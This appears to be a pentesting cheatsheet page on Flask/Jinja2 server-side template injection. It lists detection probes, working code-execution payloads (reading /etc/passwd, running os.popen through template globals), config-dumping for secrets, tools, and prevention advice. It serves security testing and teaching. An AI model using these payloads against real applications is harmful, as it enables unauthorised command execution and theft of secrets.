
Flask Jinja

Web cheatsheet — Web application enumeration and exploitation techniques.

Overview

Server-Side Template Injection (SSTI) is a vulnerability that occurs when an attacker can inject template directives into a template engine. Unlike XSS, which targets the client, SSTI targets the server-side template engine itself and often leads to remote code execution on the server.

Common template engines affected include Jinja2 (Python), Twig (PHP), FreeMarker (Java), and Handlebars (JavaScript).

Category: Web

Key Commands & Payloads

The following payloads are commonly used when testing for or exploiting SSTI in Flask/Jinja2 templates:

{{7*7}}
{{7*'7'}}
{{7|string}}
{{config}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()[<index>]('cat /etc/passwd',shell=True,stdout=-1).communicate()}}
{{lipsum.__globals__['os'].popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}

Tools & Techniques

Recommended tools and techniques for Flask/Jinja2 SSTI:

  • TplMap: template injection detection and exploitation
  • Manual detection with {{7*7}} etc.
  • Identify template engine with math operations
  • Read framework config for secrets ({{config}})
  • Escalate to RCE via Python/Java object chains

Prevention & Mitigation

Security recommendations to prevent SSTI in Flask/Jinja2:

  • Never allow user input in template directives
  • Sandbox template engines when user input must be processed
  • Use logic-less template engines (Mustache, Handlebars)
  • Keep template engines updated to latest versions
  • Implement strict input validation and output encoding
